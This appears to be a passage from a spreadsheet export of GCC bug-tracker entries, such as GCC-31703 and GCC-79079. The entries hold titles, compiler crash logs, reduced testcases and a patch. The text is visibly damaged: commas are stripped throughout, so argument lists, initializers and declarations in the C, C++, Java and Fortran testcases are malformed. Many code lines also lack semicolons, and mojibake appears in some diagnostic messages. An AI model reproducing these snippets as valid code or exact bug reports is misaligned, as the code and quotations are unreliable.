 &lt;template_decl 0x40230138 operator delete
    type &lt;function_type 0x401aebc8
        type &lt;void_type 0x401a64e0 void type_6 VOID
            align 8 symtab 0 alias set -1 canonical type 0x401a64e0
            pointer_to_this &gt;
        type_6 QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x401aebc8
        arg-types 
            chain 
                chain &gt;&gt;&gt;
        pointer_to_this &gt;
    used ignored decl_1 VOID file bug.cc line 5 col 48
    align 1 context 
    arguments 
        value 
            elt 0 &gt;&gt;
    result 
        public external no-static-chain decl_3 QI file bug.cc line 5 col 48 align 8 context 
        arguments 
            unsigned SI file bug.cc line 5 col 48
            size 
            unit size 
            align 32 chain &gt;
        template-info 0x4022d6c8&gt;
   &gt;
bug.cc: In function 'void __static_initialization_and_destruction_0(int int)':
bug.cc:8: internal compiler error: gimplification failed
Please submit a full bug report [etc.]
GCC 2.95.3 used to generate a valid error message:
bug.cc: In function `void __static_initialization_and_destruction_0(int int)':
bug.cc:8: no suitable operator delete for `A'</t>
  </si>
  <si>
    <t>GCC-31703</t>
  </si>
  <si>
    <t>[4.3 regression]: Gcc 4.3 revision 124101 failed to compile gcc 3.2</t>
  </si>
  <si>
    <t>bash-3.1$ ./xgcc -m32 -B./ -O2 -S /tmp/reload1.i 
reload1.c: In function â€˜reload_reg_free_pâ€™:
reload1.c:4420: internal compiler error: in simplify_subreg at simplify-rtx.c:4677
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Revision 123850 is OK.</t>
  </si>
  <si>
    <t>GCC-66236</t>
  </si>
  <si>
    <t>[6 Regression] FAIL: gcc.c-torture/execute/pr42691.c on alpha-linux-gnu</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
UNRESOLVED: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  compilation failed to produce executable
FAIL: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
UNRESOLVED: gcc.c-torture/execute/pr42691.c   -O3 -fomit-frame-pointer -funroll-loops  compilation failed to produce executable
Executing on host: /space/uros/gcc-build/gcc/xgcc -B/space/uros/gcc-build/gcc/ /space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -O3 -fomit-frame-pointer -funroll-loops  -w  -lm    -o ./pr42691.exe    (timeout = 300)
spawn /space/uros/gcc-build/gcc/xgcc -B/space/uros/gcc-build/gcc/ /space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -fomit-frame-pointer -funroll-loops -w -lm -o ./pr42691.exe^M
/space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c: In function 'add':^M
/space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c:32:1: error: unrecognizable insn:^M
(insn 87 86 29 5 (set (subreg:DI (reg:V4HI 90) 0)^M
        (reg:V4HI 94)) /space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c:19 -1^M
     (expr_list:REG_DEAD (reg:V4HI 94)^M
        (nil)))^M
/space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.c-torture/execute/pr42691.c:32:1: internal compiler error: in extract_insn at recog.c:2341^M
0x1207809c7 _fatal_insn(char const* rtx_def const* char const* int char const*)^M
        ../../gcc-svn/trunk/gcc/rtl-error.c:110^M
0x120780a17 _fatal_insn_not_found(rtx_def const* char const* int char const*)^M
        ../../gcc-svn/trunk/gcc/rtl-error.c:118^M
0x120747bcf extract_insn(rtx_insn*)^M
        ../../gcc-svn/trunk/gcc/recog.c:2341^M
0x120b99d5f union_match_dups^M
        ../../gcc-svn/trunk/gcc/web.c:118^M
0x120b99d5f execute^M
        ../../gcc-svn/trunk/gcc/web.c:395^M</t>
  </si>
  <si>
    <t>GCC-79079</t>
  </si>
  <si>
    <t>[6] Wrong code gen for __builtin_mul_overflow when TRULY_NOOP_TRUNCATION (32 64) == false</t>
  </si>
  <si>
    <t>expand function on __builtin_mul_overflow is missing gen a truncdisi2 after muldi3 since it's just call gen_lowpart and it's not consider TRULY_NOOP_TRUNCATION == false
GCC configure:
--target=mips64-unknown-linux-gnu --with-abi=64
or
--target=riscv64-unknown-linux-gnu (Review in progress)
(https://gcc.gnu.org/ml/gcc-patches/2017-01/msg00776.html)
Testcase:
c-c++-common/torture/builtin-arith-overflow-12.c
Reduced testcase (extract from builtin-arith-overflow-12.c):
int v
__attribute__((noinline noclone)) void
bar (void)
{
  v++
}
__attribute__((noinline noclone)) signed int t115_1mul (unsigned int x signed int y) {
  signed int r
  if (__builtin_mul_overflow (x y &amp;r))
    bar ()
  return r
}
int main()
{
  unsigned int x = ((unsigned int) 0x7fffffff + 1)
  signed int y = (-1)
  signed int r1 r2 v = 0
  if (t115_1mul (x y) != (signed int) ((-0x7fffffff - 1)))
     __builtin_abort ()
  return 0
}
Patch:
diff --git a/gcc/internal-fn.c b/gcc/internal-fn.c
index c07b538..3c92183 100644
--- a/gcc/internal-fn.c
+++ b/gcc/internal-fn.c
@@ -12727 +12727 @@ expand_mul_overflow (location_t loc tree lhs tree arg0 tree arg1
          rtx hipart = expand_shift (RSHIFT_EXPR wmode res prec
                                     NULL_RTX uns)
          hipart = gen_lowpart (mode hipart)
-         res = gen_lowpart (mode res)
+         res = convert_modes (mode wmode res uns)
          if (uns)
            /* For the unsigned multiplication there was overflow if
               HIPART is non-zero.  */
This patch already run gcc testsuite for mips64 x86-64 and riscv64/riscv32 fix  mips64 and riscv64 for builtin-arith-overflow-12.c and no introduce new regression on x86-64 and riscv32</t>
  </si>
  <si>
    <t>GCC-19103</t>
  </si>
  <si>
    <t>[4.0 Regression] Current CVS (2004/12/21) doesn't compile with profiledbootstrap</t>
  </si>
  <si>
    <t>Trying to bootstrap current CVS results in: 
./xgcc -B./ -B/usr/i586-ark-linux/bin/ -isystem /usr/i586-ark-linux/include  
-isystem /usr/i586-ark-linux/sys-include  
-L/usr/src/ark/BUILD/gcc4/build/gcc/../ld -O2 -DIN_GCC    -W -Wall  
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  
-Wold-style-definition  -isystem ./include  -I. -I. -I../../gcc -I../../gcc/.  
-I../../gcc/../include -I../../gcc/../libcpp/include   -g0  
-finhibit-size-directive -fno-inline-functions -fno-exceptions  
-fno-zero-initialized-in-bss -fno-unit-at-a-time -fno-omit-frame-pointer \  
   -c ../../gcc/crtstuff.c -DCRT_BEGIN \  
  -o crtbegin.o  
../../gcc/crtstuff.c: In function '__do_global_dtors_aux':  
../../gcc/crtstuff.c:290: internal compiler error: virtual array prologue[3]:  
element 1 out of bounds in contains at function.c:4629  
Please submit a full bug report  
with preprocessed source if appropriate.  
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78602</t>
  </si>
  <si>
    <t>PowerPC vec-extract-v2df.c can fail if -mcpu=power9 -O0</t>
  </si>
  <si>
    <t>In doing testing of a future patch I forgot to apply any optimization when I was building the vec-extract-v*.c tests for -mcpu=power9 and the compiler fails with an insn not found error:
-genoa-&gt; ./xgcc -B./ -save-temps -c -mcpu=power9 vec-extract-v2df.c 
In file included from vec-extract-v2df.c:9:0:
vec-extract.h: In function 'get_auto_n':
vec-extract.h:36:1: error: unrecognizable insn:
 }
 ^
(insn 8 7 9 2 (parallel [
            (set (reg:DF 158)
                (unspec:DF [
                        (reg:V2DF 157)
                        (mem/c:DI (plus:DI (reg/f:DI 150 virtual-stack-vars)
                                (const_int 16 [0x10])) [4 n+0 S8 A64])
                    ] UNSPEC_VSX_EXTRACT))
            (clobber (scratch:DI))
            (clobber (scratch:V2DI))
        ]) vec-extract.h:35 -1
     (nil))
vec-extract.h:36:1: internal compiler error: in extract_insn at recog.c:2311
0x10888313 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk-242932/gcc/rtl-error.c:108
0x10888377 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk-242932/gcc/rtl-error.c:116
0x1084bc4b extract_insn(rtx_insn*)
        /home/meissner/fsf-src/trunk-242932/gcc/recog.c:2311
0x105703a7 instantiate_virtual_regs_in_insn
        /home/meissner/fsf-src/trunk-242932/gcc/function.c:1589
0x105703a7 instantiate_virtual_regs
        /home/meissner/fsf-src/trunk-242932/gcc/function.c:1956
0x105703a7 execute
        /home/meissner/fsf-src/trunk-242932/gcc/function.c:2005
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The cause of the error is the rs6000_expand_vector_extract function was expecting the element number to be either a constant or a register.  Normal optimization does a force_reg before doing the expansion in the hopes of letting GCSE find common instructions.  However if no optimization is used this is not done.</t>
  </si>
  <si>
    <t>GCC-39414</t>
  </si>
  <si>
    <t>PROCEDURE statement double declaration bug</t>
  </si>
  <si>
    <t>The following code is invalid but currently accepted by gfortran:
procedure(iabs) :: p
integer :: p
end
It is also accepted when the two statements are reversed in order.
It's not completely obvious to me whether this variant is invalid too:
procedure() :: p
integer :: p
It is rejected by g95 but one could argue that it is valid in the same way as:
external :: p
integer :: p</t>
  </si>
  <si>
    <t>GCC-24826</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] Incorrect default options</t>
  </si>
  <si>
    <t>At some point between 4.0 and 4.1 the mechanism for option handling was
changed over to the new style using the .opt file but the default setting of
quickcall seems to have been lost in the process.
adding the following 2 lines into h8300.c
	#undef TARGET_DEFAULT_TARGET_FLAGS
	#define TARGET_DEFAULT_TARGET_FLAGS (MASK_QUICKCALL)
immediately before the line
	struct gcc_target targetm = TARGET_INITIALIZER
appears to fix the problem allthough I am not sure that this is completely
the correct way to do this.</t>
  </si>
  <si>
    <t>mlist</t>
  </si>
  <si>
    <t>GCC-7190</t>
  </si>
  <si>
    <t>failed_reload error while compiling XFree86-4</t>
  </si>
  <si>
    <t>When compiling the XFree86 4.2.0 Server (available in FreeBSD ports as /usr/ports/x11-servers/XFree86-4-Server) the following problem arises and further compilation is impossible. This happens every time on this file no exceptions:
In file included from translate.c:779:
../../../../extras/Mesa/src/trans_tmp.h: In function `trans_1_GLdouble_1ub_elt':
../../../../extras/Mesa/src/trans_tmp.h:124: could not find a spill register
(insn 96 94 97 (set (subreg:SF (reg:QI 75) 0)
        (plus:SF (reg:SF 8 st(0) [76])
            (reg:SF 9 st(1) [80]))) 525 {*fop_sf_comm_nosse} (insn_list 87 (nil))
    (expr_list:REG_DEAD (reg:SF 8 st(0) [76])
        (nil)))
../../../../extras/Mesa/src/trans_tmp.h:124: Internal compiler error in failed_reload at reload1.c:5050
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
*** Error code 1
Stop in /mnt/export2/ports/x11-servers/XFree86-4-Server/work/xc/lib/GL/mesa/src.
Release:
gcc (GCC) 3.1 [FreeBSD] 20020509 (prerelease)
Environment:
FreeBSD 5.0-CURRENT #1: Mon Jul  1 22:55:37 GMT 2002
CPU: AMD Athlon(tm) processor (1334.97-MHz 686-class CPU)
  Origin = AuthenticAMD  Id = 0x644  Stepping = 4
real memory  = 536805376 (524224K bytes)
How-To-Repeat:
Use a relatively current FreeBSD-CURRENT (this problem has been going on for about a month or so) make the port in x11-servers/XFree86-4-Server and watch it fail.</t>
  </si>
  <si>
    <t>niklas</t>
  </si>
  <si>
    <t>GCC-6706</t>
  </si>
  <si>
    <t>[3.4 regression] ICE with variable-sized arrays and DWARF-1 output</t>
  </si>
  <si>
    <t>gcc reports internal error: Segmentation fault when
trying to compile attached code.
Release:
gcc-3.1
Environment:
i686-pc-linux-gnu slackware 8.0
How-To-Repeat:
/usr/local/lang/gcc/bin/g++ -Wall -save-temps -pipe -gdwarf -o junk140 junk140.cc</t>
  </si>
  <si>
    <t>jblinka</t>
  </si>
  <si>
    <t>GCC-26362</t>
  </si>
  <si>
    <t>ICE on the autovect-branch (gfortran example)</t>
  </si>
  <si>
    <t>gfortran-autovect -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/autovect --program-suffix=-autovect --enable-threads=posix --enable-languages=cc++fortran
Thread model: posix
gcc version 4.2.0-autovect 20060214 (experimental)
gfortran-autovect -O3 -Wunused -fautomatic -mfpmath=sse -msse -mmmx -msse2 -ftree-vectorize -ftree-vectorizer-verbose=2 -c xyz1.for xyz1.for: In function â€˜xyz1â€™:
xyz1.for:1: internal compiler error: in make_ssa_name at tree-ssanames.c:129
Please submit a full bug report
      SUBROUTINE XYZ1
C
      IMPLICIT DOUBLE PRECISION ( A - H O - Z ) INTEGER ( I - N )
C
      COMMON /ABC/ MMSAD( 250 ) MCAI( 500 )
C
      DIMENSION JTMP( 750 ) KTMP( 750 )
      DIMENSION MTMP( 750 ) LTMP(750)
C
      IF ( IJK .LT. KJI )  THEN
         DO 500 JKL = 1 ILS
            IF ( MTMP(JKL) .LT. 0 ) THEN
               IJK = IJK + 1
               MTMP(JKL) = IJK
            END IF
 500     CONTINUE
C
         MMS = 0
         DO 1000 JKL = 1 ILS
            MMS = MMS + 2
            JTMP(JKL) = MMSAD(JKL)
            KTMP(JKL) = MCAI(MMS-1)
            LTMP(JKL) = MCAI( MMS )
 1000    CONTINUE
C
         DO 9000 JKL = 1 ILS
            KF1 = MTMP(JKL)
            MMS = KF1 + KF1
            MMSAD(KF1)  = JTMP(JKL)
            MCAI(MMS-1) = KTMP(JKL)
            MCAI( MMS ) = LTMP(JKL)
 9000    CONTINUE
C
      END IF
C
      RETURN
      END</t>
  </si>
  <si>
    <t>GCC-3354</t>
  </si>
  <si>
    <t>Internal compiler error while compiling ORBIX 3.3 CORBA code</t>
  </si>
  <si>
    <t>$ make
g++ -I../../include -I/cygdrive/c/WIN32APP/Tools/Iona/include -g -Wall -c ConfigServer.cpp
In file included from /cygdrive/c/WIN32APP/Tools/Iona/include/corba/PreCORBA.h:122
                 from /cygdrive/c/WIN32APP/Tools/Iona/include/CORBA.h:22
                 from ConfigServer.h:27
                 from ConfigServer.cpp:5:
/usr/include/w32api/winsock2.h:96: warning: #warning fd_set and associated macros have been defined in sys/types.      This may cause runtime problems with W32 sockets
In file included from /cygdrive/c/WIN32APP/Tools/Iona/include/CORBA.h:22
                 from ConfigServer.h:27
                 from ConfigServer.cpp:5:
/cygdrive/c/WIN32APP/Tools/Iona/include/corba/PreCORBA.h:111: warning: ignoring pragma:
In file included from /cygdrive/c/WIN32APP/Tools/Iona/include/CORBA.h:49
                 from ConfigServer.h:27
                 from ConfigServer.cpp:5:
/cygdrive/c/WIN32APP/Tools/Iona/include/corba/PseudoIDL.h:419: Internal compiler error.
/cygdrive/c/WIN32APP/Tools/Iona/include/corba/PseudoIDL.h:419: Please submit a full bug report.
/cygdrive/c/WIN32APP/Tools/Iona/include/corba/PseudoIDL.h:419: See  for instructions.
The second warning has to do with the FD_SETSIZE:
---PreCORBA.h:110-117
 #if defined(FD_SETSIZE) &amp;&amp; FD_SETSIZE &lt; 1024
#pragma message (\nWarning: Orbix wants an fd_set of size 1024 or greater \n \
Please include CORBA.h before winsock2.h\n)
 #else
  #ifndef FD_SETSIZE
   #define FD_SETSIZE 1024
  #endif 
 #endif
---
The ICE occurs at:
---PseudoIDL.h:414-420
static ITDECLSPEC void IT_CALL_SPEC
release
(
	NamedValue_ptr obj
	Environment&amp; = IT_chooseDefaultEnv()
)
---
I know Iona doesn't support gcc on NT for Orbix 3.3 but an Internal Compiler Error??? I would love to be able to use gcc rather than VC.
Release:
gcc version 2.95.3-4 (cygwin special)
Environment:
Windows NT4.0/5.0 cygwin 1.3 Orbix 3.3 for C++ on NT</t>
  </si>
  <si>
    <t>bert.laverman</t>
  </si>
  <si>
    <t>GCC-34548</t>
  </si>
  <si>
    <t>GCC generates too many alignment adds for alloca</t>
  </si>
  <si>
    <t>WRT http://gbenson.livejournal.com/2007/12/21/
GCC is being overzealous because of a default that was local to one file was made global on 2003-10-07 and this changed the behavior of the #if statement in explow.c's allocate_dynamic_stack_space():
#if defined (STACK_DYNAMIC_OFFSET) || defined (STACK_POINTER_OFFSET)
#define MUST_ALIGN 1
#else
#define MUST_ALIGN (PREFERRED_STACK_BOUNDARY &lt; BIGGEST_ALIGNMENT)
#endif
Unfortunately STACK_POINTER_OFFSET isn't a preprocessor constant on all ports.  We could change the above to:
#if defined (STACK_DYNAMIC_OFFSET)
#define MUST_ALIGN 1
#else
#define MUST_ALIGN (STACK_POINTER_OFFSET || PREFERRED_STACK_BOUNDARY &lt; BIGGEST_ALIGNMENT)
#endif
but on at least one port (pa) STACK_POINTER_OFFSET depends on the size of the outgoing arguments of a function which we don't necessarily know yet at the point we expand alloca builtins.  For pa it's never zero but for other ports it might be and then this would break.
BTW function.c still provides a no-longer-necessary default for STACK_POINTER_OFFSET.</t>
  </si>
  <si>
    <t>GCC-37</t>
  </si>
  <si>
    <t>virtual functions for local class not generated</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Mon 5 Jul 1999 17:16:23 -0700 (PDT)
 Reply-To: Fedor G. Pikus 
 Original-Message-ID: 
 Problem: the following C++ code compiles and links without
 optimization does not link when compiled with optimization.
 System: Linux Redhat 6.0 kernel 2.2.5.
 EGCS version: 1.1.2 egcs --version reports egcs-2.91.66
 Source:
 ----------------------------- begin source ---------------------------------
 class b 
 {
     public: 
     virtual void *f(void *c) = 0 
     // virtual void *f(void *c) {} // This works exactly like the line above.
 }
 int main() 
 {             
     // Defining this class outside fixes the problem 
     // but in the real code it's NOT POSSIBLE.
     class d : public b {
	 public:  
	 // virtual // virtual here makes no difference
	 void *f(void *c) { }
     } 
     // This is the important line: remove it 
     // and the unresolved symbol goes away!
     d D 
     // new d // has the same effect as the line above.
 }                                               
 ----------------------------- end source ---------------------------------
 EGCS command:
 c++ -O0 ~/nolink.C &lt;- works fine
 c++ -O1 ~/nolink.C &lt;- does not link:
 /tmp/ccPZtRSO.o(.gnu.linkonce.d.__vt_Q26main.0_1d+0x8): undefined reference to `f__Q26main.0_1dPv.24'
 collect2: ld returned 1 exit status
 EGCS with -v
 c++ -v -O1 ~/nolink.C
 ----------------------------- begin output -----------------------------
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cpp -lang-c++ -v -undef -D__GNUC__=2 -D__GNUG__=2 -D__cplusplus -D__GNUC_MINOR__=91 -D__ELF__ -Dunix -Di386 -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__i386__ -D__linux__ -D__unix -D__i386 -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -Asystem(unix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ /user/fedorp/nolink.C nolink.ii
 GNU CPP version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/include/g++-2
  /usr/i386-redhat-linux/include
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/include
  /usr/include
 End of search list.
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cc1plus nolink.ii -quiet -dumpbase nolink.cc -O1 -version -o nolink.s
 GNU C++ version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386-redhat-linux) compiled by GNU C version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release).
  as -V -Qy -o nolink.o nolink.s
 GNU assembler version 2.9.1 (i386-redhat-linux) using BFD version 2.9.1.0.23
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/crtbegin.o -L/usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66 -L/usr/i386-redhat-linux/lib nolink.o -lstdc++ -lm -lgcc -lc -lgcc /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/crtend.o /usr/lib/crtn.o
 nolink.o(.gnu.linkonce.d.__vt_Q26main.0_1d+0x8): undefined reference to `f__Q26main.0_1dPv.2'
 collect2: ld returned 1 exit status
 ----------------------------- end output -----------------------------
 Thank you in advance.
 -- 
				   Fedor G. Pikus
 WWW: http://www.coho.net/~pikus/
 Mentor Graphics Corporation         | 8625 SW Sorrento Rd
 8405 SW Boeckman Road               | Beaverton Oregon 97008
 Wilsonville Oregon 97070           |
 Phone: (503) 685-4857               | Phone: (503) 641 0306
 FAX:   (503) 685-1302               | FAX:   (503)
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-44181</t>
  </si>
  <si>
    <t>-fcompare-debug failure (length) with -Os -fgraphite-identity</t>
  </si>
  <si>
    <t>Compiler flags:
g++ -Os -fgraphite-identity -fcompare-debug testcase.c
Tested revisions:
r159511 - fail
r159045 - fail
r158095 - fail</t>
  </si>
  <si>
    <t>GCC-2953</t>
  </si>
  <si>
    <t>ICE in inner class constructor.</t>
  </si>
  <si>
    <t>public class Ice {
    public class Eci {
        public Eci(String s) { this(s 1) }
        public Eci(String s int i) { }
    }
}
mjr::anonFreenet$ gcj -C Ice.java
Ice.java: In class `Ice$Eci':
Ice.java: In method `(Icejava.lang.String)':
Ice.java:1: Internal compiler error in generate_bytecode_insns at
java/jcf-write.c:1512
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
Current trunk and branch
Environment:
RHL7.x/x86 and probably others
How-To-Repeat:
Compile the test case.</t>
  </si>
  <si>
    <t>GCC-1410</t>
  </si>
  <si>
    <t>Static initializer in DecimalFormat eventually depends on itself</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: Tenative fix submitted: http://sourceware.cygnus.com/ml/java-patches/1999-q3/msg00196.html -BM
</t>
  </si>
  <si>
    <t>GCC-9858</t>
  </si>
  <si>
    <t>Extra virtual functions in ctype</t>
  </si>
  <si>
    <t>ctype has some non-standard virtual functions for example bool do_is(mask char).
Release:
gcc-3.2.1
Environment:
Red Hat Linux 8.0
How-To-Repeat:
See attachment.</t>
  </si>
  <si>
    <t>GCC-31498</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with vector initializer in template</t>
  </si>
  <si>
    <t>Testcase:
typedef __attribute__((__vector_size__(16) )) unsigned char vec_uchar16
template
void permute(Tx x Ty y Tz z Tw w)
{
    const vec_uchar16 pattern =
        (vec_uchar16){4*x 4*x+1 4*x+2 4*x+3
                      4*y 4*y+1 4*y+2 4*y+3
                      4*z 4*z+1 4*z+2 4*z+3
                      4*w 4*w+1 4*w+2 4*w+3}
}
int main()
{
  permute(1234)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-78467</t>
  </si>
  <si>
    <t>[7 regression] gcc.dg/tree-prof/comp-goto-1.c FAILs</t>
  </si>
  <si>
    <t>Between 20161117 and 20161121 gcc.dg/tree-prof/comp-goto-1.c started to FAIL on
32-bit SPARC:
+FAIL: gcc.dg/tree-prof/comp-goto-1.c execution    -fprofile-generate -D_PROFIL
E_GENERATE
+UNRESOLVED: gcc.dg/tree-prof/comp-goto-1.c compilation  -fprofile-use -D_PROFI
LE_USE
+UNRESOLVED: gcc.dg/tree-prof/comp-goto-1.c execution    -fprofile-use -D_PROFI
LE_USE
The -fprofile-generate execution SEGVs and even gdb aborts when trying to investigate.  dbx is at least able to get a stack trace:
signal SEGV (no mapping at the fault address) in (unknown) at 0x51cdc
0x00051cdc:     
Current function is main
  158     res = simulator_kernel (2 + 1 
(dbx) where
  [1] 0x51cdc(0x2 0x11dac 0x258d8 0x3fff 0x0 0x8) at 0x51cdc 
=&gt;[2] main() line 158 in comp-goto-1.c
  Rainer</t>
  </si>
  <si>
    <t>GCC-83869</t>
  </si>
  <si>
    <t>[8 regression] c-c++-common/attr-nonstring-3.c fails starting with r256683</t>
  </si>
  <si>
    <t>Looks like there was a change in warning messages and this test case was missed?
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c  -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0  -std=gnu++98 -O2 -Wattributes -Wstringop-overflow -ftrack-macro-expansion=0  -S   -o attr-nonstring-3.s    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -O2 -Wattributes -Wstringop-overflow -ftrack-macro-expansion=0 -S -o attr-nonstring-3.s
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_printf(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:71:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:74:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:77:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_puts(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:84:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:87:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:90:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_snprintf(char* size_t MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:97:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:100:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:103:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
